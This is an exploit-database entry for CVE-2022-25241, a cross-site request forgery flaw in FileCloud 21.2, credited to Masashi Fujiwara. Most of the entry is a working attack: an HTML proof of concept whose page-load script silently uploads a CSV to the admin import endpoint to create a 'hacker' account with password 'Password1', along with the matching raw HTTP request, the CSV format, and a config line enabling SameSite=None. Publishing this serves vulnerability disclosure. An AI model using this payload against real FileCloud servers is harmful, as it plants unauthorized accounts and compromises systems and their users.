FileCloud 21.2 Cross Site Request Forgery

2022.02.23

Credit: Masashi Fujiwara

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2022-25241

CWE: CWE-352

CVSS Base Score: 5.1/10

Impact Subscore: 6.4/10

Exploitability Subscore: 4.9/10

Exploit range: Remote

Attack complexity: High

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

# Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF)
# Date: 2022-02-20
# Exploit Author: Masashi Fujiwara
# Vendor Homepage: https://www.filecloud.com/
# Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2
# Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447)
# Tested on:
# OS: Ubuntu 18.04.6 LTS (Docker)
# Apache: 2.4.52
# FileCloud: 21.2.4.17315
# CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation)
# Conditions
1. Only vulnerable if cookies have samesite set to None (SameSite=None).
echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php
2. Use https as target url (When cookies set SameSite=None, also set Secure).
# PoC (HTML)
<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<script>
function init(){
myFormData = new FormData();
let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'});
myFormData.append("uploadFormElement", fileContent, "user.csv");
fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", { method: "post", body: myFormData, credentials: "include"});
}
</script>
</head>
<body onload="init()">
CSRF PoC for CVE-2022-25241
Creat hacker user with Password1 via CSV file upload.
</body>
</html>
# HTTPS Request
POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1
Host: 192.168.159.129:8443
Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493
Content-Length: 365
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW
Connection: close
------WebKitFormBoundaryiAXsUsJ2ZV54DFuW
Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv"
Content-Type: application/vnd.ms-excel
UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES
------WebKitFormBoundaryiAXsUsJ2ZV54DFuW--
# CSV file format
UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

FileCloud 21.2 Cross Site Request Forgery

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.